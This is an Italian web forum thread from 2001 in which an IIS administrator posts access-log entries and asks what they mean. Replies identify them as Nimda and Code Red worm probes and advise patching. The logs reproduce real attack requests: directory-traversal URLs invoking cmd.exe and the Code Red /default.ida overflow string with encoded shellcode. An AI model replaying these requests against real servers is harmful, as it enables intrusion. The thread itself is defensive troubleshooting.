17 messaggi dal 14 febbraio 2001
Scusate avrei un problema:
ho un server web IIS5, da circa una settimana ho un file log degli accessi con queste righe:

GET /scripts/root.exe /c+dir 404 -
GET /MSADC/root.exe /c+dir 403 -
GET /c/winnt/system32/cmd.exe /c+dir 404 -
GET /d/winnt/system32/cmd.exe /c+dir 404 -
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 404 -
GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 404 -
GET /scripts/winnt/system32/cmd.exe /c+dir 404 -
GET /scripts/../../winnt/system32/cmd.exe /c+dir 404 -
GET /scripts/..\../winnt/system32/cmd.exe /c+dir 404 -
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 404 -
GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 404 -

2001-09-19 00:12:54 213.26.158.68 - 213.26.104.235 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -


qualcuno può darmi un dritta?

Grazie
Massimo

902 messaggi dal 19 aprile 2001
Nimda che prova ad entrare...
Cmq sono degli exploit tirati furoi prima di febbraio che permettevano di aprire una consolle da admin sul web server IIS.
Se hai installato tutte le patch (o l'admin del server) non ci sono problemi.

 Traspi.net
Da Torino al mondo Internet il magazine di cultura, creatività e informazione.
www.traspi.net
Mauro Tortone
webmaster@traspi.net

Traspi.net
Da Torino al mondo Internet il magazine di cultura, creatività e informazione.
www.traspi.net
Mauro Tortone
webmaster@traspi.net
17 messaggi dal 14 febbraio 2001
Supponevo che fosse Nimda, grazie;

per quanto riguarda:2001-09-19 00:12:54 213.26.158.68 - 213.26.104.235 80 GET /default.ida XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200 -

mi sapete dire qualcosa?

Grazie di tutto

Massimo

P.S. Gli stessi log li ho anche su un server Linux + Apache + php


902 messaggi dal 19 aprile 2001
Sempre lui o red code
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2001-0500

ti consiglio un giro su questo sito ci sono tutti i bug noti dei vari sistemi operativi.

Il fatto che l'hai trovato anche nei log di linux ecc. è normale perchè il virus sulla macchina infettatata cerca è se trova un web prova ad attaccarlo con alcuni bachi noti di iis5.

Poi se vuoi verificare lo stato del tuo web server ti consiglio di scaricare un simaptico prodotto russo (SSS shadow security scanner) che trovi al sito http://www.rsh.kiev.ua/ e che simula un attacco ad un server provando con tutti gli exploit noti a quella versione. Conosce tutti i sistemi operativi e i vari servizi. Veramente interessante..

 Traspi.net
Da Torino al mondo Internet il magazine di cultura, creatività e informazione.
www.traspi.net
Mauro Tortone
webmaster@traspi.net

Traspi.net
Da Torino al mondo Internet il magazine di cultura, creatività e informazione.
www.traspi.net
Mauro Tortone
webmaster@traspi.net
17 messaggi dal 14 febbraio 2001
Grazie della tempestività,
ancora un chiarimento:

il mio web server dovrebbe essere OK, perchè ho installato SP2 e tutte le varie patch Microsoft;
questi tentativi di accesso non dipendono dal mio server, ma da altri server che sono stati infettati, io non posso farci niente.

E' tutto giusto o non ho capito niente?

Massimo


si, hai capito alla perfezione.

--
Daniele Bochicchio
<b>Content manager di http://www.aspitalia.com</b>
http://store.aspitalia.com/scheda.asp?codice=255
ASP 3 per esempi - il mio libro

Daniele Bochicchio | ASPItalia.com | Libri
Chief Operating Officer@iCubed
Microsoft Regional Director & MVP
17 messaggi dal 14 febbraio 2001
Grazie
......un'ultima cosa:
visto che nei log si ha l'IP del client di accesso, si potrebbe cercare di contattare l'amministratore del web server infetto x avvertirlo?

Massimo

sarebbe un bell'aiuto nei suoi confronti da parte tua

--
Daniele Bochicchio
<b>Content manager di http://www.aspitalia.com</b>
http://store.aspitalia.com/scheda.asp?codice=255
ASP 3 per esempi - il mio libro

Daniele Bochicchio | ASPItalia.com | Libri
Chief Operating Officer@iCubed
Microsoft Regional Director & MVP

Torna al forum | Feed RSS

ASPItalia.com non è responsabile per il contenuto dei messaggi presenti su questo servizio, non avendo nessun controllo sui messaggi postati nei propri forum, che rappresentano l'espressione del pensiero degli autori.